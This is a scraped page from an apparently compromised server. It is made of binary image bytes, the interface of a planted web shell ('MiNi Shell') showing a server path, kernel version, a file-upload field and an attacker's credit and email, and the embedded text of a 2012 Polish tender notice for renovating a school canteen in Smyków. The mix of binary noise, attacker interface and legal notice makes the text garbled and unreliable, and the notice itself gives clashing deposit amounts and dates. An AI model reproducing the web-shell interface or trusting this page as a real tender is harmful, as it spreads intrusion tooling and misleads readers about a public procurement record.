JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120403/104164-N-2012.html

<p class="kh_header"><b>Smyków: Remont stołówki przy Szkole Podstawowej w Królewcu</b><br>
<b>Numer ogłoszenia: 104164 - 2012; data zamieszczenia: 03.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Smyków , Smyków 91, 26-212 Smyków, woj. świętokrzyskie, tel. 0-41 3739181, faks 0-41 3739181.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont stołówki przy Szkole Podstawowej w Królewcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiotem zamówienia jest remont stołówki przy Szkole Podstawowej w Królewcu, gmina  Smyków.
Zakres zamówienia obejmuje:
a)roboty remontowo - budowlane , rozbiórki i wyburzenia, roboty wewnętrzne, 
b)roboty instalacyjne wodno-kanalizacyjne i sanitarne, instalacja kanalizacji sanitarnej , instalacja c.o ,demontaż instalacji wod.-kan. , kanalizacja sanitarna, wodna i c.o. instalacja wody zimnej i ciepłej , instalacja c.o. ,  
c)roboty instalacyjne  elektryczne , kuchnia i jadalnia zasilanie , osprzęt instalacyjny, oprawy oświetleniowe, badania i pomiary.
Dokładny zakres prac objętych niniejszym zamówieniem oraz inne informacje niezbędne do właściwej wyceny robót określają:  projekt budowlany wykonawczy wraz z uzgodnieniami , specyfikacja techniczna wykonania i odbioru robót,  oraz przedmiary robót stanowiące załącznik do niniejszej SIWZ.                    

Zakres zamówienia obejmuje  przeprowadzenie niezbędnych prób i badań, uporządkowanie terenu. Wszelkie prace budowlane lub inne czynności nie opisane w niniejszym rozdziale a niezbędne do właściwego i kompletnego wykonania przedmiotu zamówienia należy uwzględnić w kalkulacji kosztów. 

3.2. DODATKOWE WARUNKI REALIZACJI PRZEDMIOTU ZAMÓWIENIA:
a) Zamawiający nie planuje że zamówienie będzie współfinansowane z innych środków.  
b) Zamawiający wymaga aby Wykonawca w terminie siedmiu dni od  dnia podpisania umowy opracował i przedstawił harmonogram rzeczowo-finansowy uwzględniający termin rozpoczęcia i zakończenia inwestycji ;                                                    
c) Wykonawca przed złożeniem oferty cenowej oraz rozpoczęciem robót powinien dokładnie zapoznać się z projektem budowlanym  łącznie z uzgodnieniami (wraz ze sprawdzeniem wszystkich wymiarów na rysunkach oraz ilości wymienionych w przedmiarze robót) oraz dokonać oględzin terenu gdzie będzie realizowany remont aby w razie stwierdzonych niejasności domagać się od Zamawiającego wyjaśnień;
d) Wykonawca nie będzie mógł żądać dodatkowego wynagrodzenia z tytułu nieznajomości terenu budowy  oraz jego specyfiki;   
e) Wykonawca jest zobowiązany do: utrzymywania w dobrym stanie  dostępu do placu budowy (w tym dróg dojazdowych),  utrzymywanie porządku na terenie remontu oraz drogach dojazdowych, zabezpieczenie zgromadzonych materiałów, zapewnienia bezpieczeństwa na terenie remontu oraz wokół niego;
i) Zamawiający zastrzega sobie prawo do ograniczenia lub rozszerzenia zakresu przedmiotu umowy;
j) Jeżeli w SIWZ pojawią się ewentualne wskazania znaków towarowych, patentów lub pochodzenia, to określają one minimalny standard jakości materiałów lub urządzeń przyjętych do wyceny. Zamawiający dopuszcza zastosowanie produktu innego producenta o parametrach równoważnych lecz nie gorszych niż przyjęto w projekcie budowlanym. Wskazanie równoważności zaoferowanego przedmiotu spoczywa na Wykonawcy.
k) Zamawiający nie przewiduje płatności częściowych  .
l) Oferta oraz kosztorys ofertowy muszą uwzględniać wszystkie koszty związane z prawidłową realizacją zamówienia. Przyjmuje się, że Wykonawca upewnił się co do prawidłowości i kompletności Oferty, która powinna pokryć wszystkie jego zobowiązania umowne, a także wszystko to co może być konieczne dla właściwego wykonania i wykończenia robót oraz usunięcia usterek..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających, o których mowa w art.67 ust. 1 pkt 6  Prawa Zamówień Publicznych , do 20,0 % wartości zamówienia .</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.33.00.00-9, 45.33.11.00-7, 45.11.00.00-1, 45.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga złożenia wadium w wysokości 4 500,00 PLN (dwadzieścia  tysięcy złotych 00/100 groszy). Wadium może być wniesione zgodnie z art. 45 ust.6 ustawy Pzp tj; w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowe z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2   ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. z 2000 r. , Nr 109, poz. 1158, z późn. zm.). 
Jeżeli wadium wnoszone będzie w formie  gwarancji bankowej/ ubezpieczeniowej to w treści gwarancji winny znaleźć się następujące elementy:
1)	zobowiązanie banku / towarzystwa ubezpieczeniowego do zapłaty sumy wadium w przypadku gdy zajdą ku temu ustawowe okoliczności, określone w przepisie art. 46 ust. 5 Pzp.,
2)	dokładną nazwę postępowania stanowiącego przyczynę wystawienia gwarancji,
3)	wskazanie sumy gwarancyjnej,
4)	wskazanie Zamawiającego, czyli beneficjenta gwarancji/ ubezpieczonego,
/ tj. Gmina Smyków - Wójt Gminy/,
5)	wskazanie Wykonawcy, czyli zleceniodawcy gwarancji / ubezpieczyciela
6)	określenie okresu ważności gwarancji tj. wskazanie terminu, w którym zobowiązanie powstaje oraz wygasa, przy czym gwarancja o charakterze terminowym nie może zostać odwołana.
Wadium wnoszone w pieniądzu należy wpłacić przelewem  na rachunek bankowy zamawiającego: 48 8493 0004 0030 0506 0772 0001 .  Do oferty należy dołączyć  dowód  wniesienia wadium (kserokopie - poświadczoną za zgodność z oryginałem).
W przypadku wadium wniesionego  w  formie gwarancji, z treści tej gwarancji winno wynikać bezwarunkowo, że na każde pisemne żądanie zgłoszone przez zamawiającego, w terminie związania ofertą, gwarant zobowiązuje się do wypłaty Zamawiającemu  pełnej kwoty wadium w okolicznościach określonych art. 46 ust. 5 ustawy Pzp .  
Wadium należy wnieść do dnia 19 kwietnia 2012r. ,  do godz. 10:00 .
Za zachowanie terminu do wniesienia wadium w przypadku przelewu lub przekazu uważa się uznanie rachunku bankowego Zamawiającego do dnia  19 kwietnia 2011 r, do godz.10:00 .
Zwrot oraz zatrzymanie wadium następuje na zasadach określonych w art. 46 ustawy Prawo zamówień publicznych. Wadium musi być zabezpieczone na okres 30 dni, licząc od daty składania ofert - termin związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, tzn.;
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi  do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia  na podstawie  art.24 ustawy Prawo zamówień publicznych.
                                                      
Za spełnienie warunku określonego w pkt 8.1  lit. b) Zamawiający uzna:
-	wykonanie przez Wykonawcę  z należytą starannością i zakończonych ,  co najmniej dwóch zamówień o wartości nie mniejszej niż 200 000,00 PLN każde , o wielkości i charakterze zbliżonym do będącego przedmiotem przetargu, polegającego na wykonaniu budowy , rozbudowy , nadbudowy obiektów kubaturowych w okresie ostatnich pięciu lat przed dniem wszczęcia  postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności firmy jest krótszy w tym okresie. Wartość wykonanego z należyta starannością i zakończonego przynajmniej  jednego zamówienia winna wynosić co najmniej  200 000,00 PLN  brutto.  
-	dysponowanie zdolnymi do wykonania zamówienia osobami to jest kierownikiem budowy uprawnionym w zakresie w jakim przepisy prawa budowlanego wymagają od kierowania robotami budowlanymi stanowiącymi przedmiot zamówienia w specjalności  konstrukcyjno - budowlanej, należącym do właściwej izby samorządu zawodowego.
Ocena spełniania warunków udziału w postępowania dokonana zostanie wg. kryterium spełnia/nie spełnia odbędzie się na podstawie złożonych dokumentów i oświadczeń wymienionych w punkcie 9 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna:
-	wykonanie przez Wykonawcę  z należytą starannością i zakończonych ,  co najmniej dwóch zamówień o wartości nie mniejszej niż 200 000,00 PLN każde , o wielkości i charakterze zbliżonym do będącego przedmiotem przetargu, polegającego na wykonaniu budowy , rozbudowy , nadbudowy obiektów kubaturowych w okresie ostatnich pięciu lat przed dniem wszczęcia  postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności firmy jest krótszy w tym okresie. Wartość wykonanego z należytą starannością i zakończonego przynajmniej  jednego zamówienia winna wynosić co najmniej  200 000,00 PLN  brutto.  

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymaga się aby przynajmniej jeden z Wykonawców (lub wspólnie)  spełniał wymagania o których mowa w pkt. 8.1. a),b),c). W przypadku konsorcjum żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu na podstawie art.24 ust. 1 i 2 ustawy.
 Zamawiający zastrzega sobie, że w przypadku, kiedy umowa o wykonanie zamówienia publicznego będzie zawierana z kilkoma Wykonawcami występującymi wspólnie do umowy tej zostaną wprowadzone postanowienia ustalające solidarną odpowiedzialność tych Wykonawców za wykonanie  zobowiązań wynikających z umowy w pełnym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie zdolnymi do wykonania zamówienia osobami to jest kierownikiem budowy uprawnionym w zakresie w jakim przepisy prawa budowlanego wymagają od kierowania robotami budowlanymi stanowiącymi przedmiot zamówienia w specjalności  konstrukcyjno - budowlanej, należącym do właściwej izby samorządu zawodowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- oświadczenie, o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ustawy z dnia 29 stycznia  2004 r. Prawo zamówień publicznych - (wg wzoru podanego w załączniku nr 2a ),
- oświadczenie , że nie podlegam wykluczeniu z postępowania na podstawie art.24 ust.1pkt.2 Prawa zamówień publicznych ( wg. wzoru podanego załączniku nr 2b ) 
- wykonanie przez Wykonawcę  z należytą starannością i zakończonych ,  co najmniej dwóch zamówień o wartości nie mniejszej niż 200 000,00 PLN każde , o wielkości i charakterze zbliżonym do będącego przedmiotem przetargu, polegającego na wykonaniu budowy , rozbudowy , nadbudowy obiektów kubaturowych w okresie ostatnich pięciu lat przed dniem wszczęcia  postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności firmy jest krótszy w tym okresie. Wartość wykonanego z należyta starannością i zakończonego przynajmniej  jednego zamówienia winna wynosić co najmniej  200 000,00 PLN  brutto ( wg. wzoru podanego załączniku nr 3 ) 
- wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu  zamówienia,  wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia oraz zakresu wykonywanych przez nich czynności (wg wzoru podanego w załączniku nr 4), 
- pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 9.1.g) SIWZ wykonawca wskazał osoby  którymi będzie dysponował,

-  wykaz części zamówienia, których realizację wykonawca zamierza powierzyć podwykonawcom (wg wzoru podanego w załączniku nr 5)
-	dowód wniesienia wadium.
- Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej w zakresie składanych dokumentów zastosowanie ma odpowiednio §4 ust.1.pkt.1 , p.pkt.a,b,c i pkt.2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów , jakich może żądać zamawiający od wykonawcy , oraz form , w jakich te dokumenty mogą być składane (Dz.U. z 2009 r. ,  Nr 226 ,  poz. 1817 ) . Dokumenty sporządzone w języku obcym winny być składane wraz z tłumaczeniem na język polski , sporządzonym i podpisanym ( każdy dokument) przez Wykonawcę lub tłumacza przysięgłego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ewentualne zmiany umowy dotyczyć mogą wyłącznie:
 - zmiany terminów i płatności objętych harmonogramem rzeczowo-finansowym     
 - w    przypadku gdy o zmianę taką  wystąpi Zamawiający, lub zmiana taka stanie się konieczna ze względu na okoliczności, których nie można było przewidzieć w chwili składania oferty lub wystąpią istotne zmiany zakresu rzeczowego robót wynikające ze zmian projektowych, a zmianę zaakceptuje Zamawiający, 
 - zmiany osób lub podmiotów odpowiedzialnych za wykonywanie zadania ze strony  Wykonawcy  lub Zamawiającego                                                                                                 - jeżeli zmiana taka nie wpłynie na pozostałe warunki  realizacji umowy,
- zmiany zakresu robót  - jeżeli z wnioskiem takim wystąpi Zamawiający lub zmiana taka stanie się konieczna ze względu na okoliczności, których nie można było przewidzieć            w chwili składania oferty,
- zmiany wynagrodzenia -  jeżeli nastąpi zmiana zakresu robót lub wystąpią roboty zamienne generujące zmianę kosztów, jak również w przypadku urzędowej zmiany  wysokości stawki podatku VAT,
- zmian przewidzianych zapisami  umowy lub siwz.
 Zamawiający dopuszcza także możliwość zmian umowy w następujących przypadkach:
-  gdy wprowadzenie  zmian jest  korzystne dla Zamawiającego
-  wystąpienie zdarzeń losowych
- wystąpienie zmian których konieczność wprowadzenia będzie  wynikała z wymagań instytucji   współfinansujących realizację przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.smykow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Smykowie od poniedziałku do piątku w godzinach pracy Urzędu od 7.30 do 15.30
Osoba do kontaktu: Ryszard Janus - inspektor ds. budownictwa tel. 41/37 39 184.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.04.2012 godzina 10:00, miejsce: Ofertę należy złożyć w sekretariacie Urzędu Gminy w Smykowie  , Smyków nr 91 , 26-212 Smyków , pok. nr 1,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com